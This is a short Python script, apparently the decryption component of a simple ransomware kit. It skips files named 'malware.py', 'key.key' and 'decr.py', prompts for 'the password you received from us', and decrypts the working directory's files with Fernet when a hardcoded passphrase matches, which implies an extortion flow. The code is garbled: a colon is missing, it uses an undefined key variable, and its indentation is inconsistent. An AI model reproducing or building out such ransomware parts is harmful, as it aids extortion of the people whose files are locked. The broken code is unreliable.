#!/usr/bin/env python3

import os
from cryptography.fernet import Fernet

allfiles = []
for file in os.listdir():
	if file == "malware.py" or file == "key.key" or file == "decr.py":
		 continue
	if os.path.isfile(file)
		allfiles.append(file)

print(allfiles)

with open("key.key", "rb") as thekey:
	password = key.read()
passphrase = "R0mo3!1x"
userpass = input("Enter the password you received from us: ")
        if userpass == passphrase:
 	            for file in allfiles:
	            with open(file, "rb") as thefile:
		                  contents = thefile.read()
	                    content_decr = Fernet(key).decrypt(contents)
	             with open(file, "wb") as thefile:
		           thefile.write(content_decr)
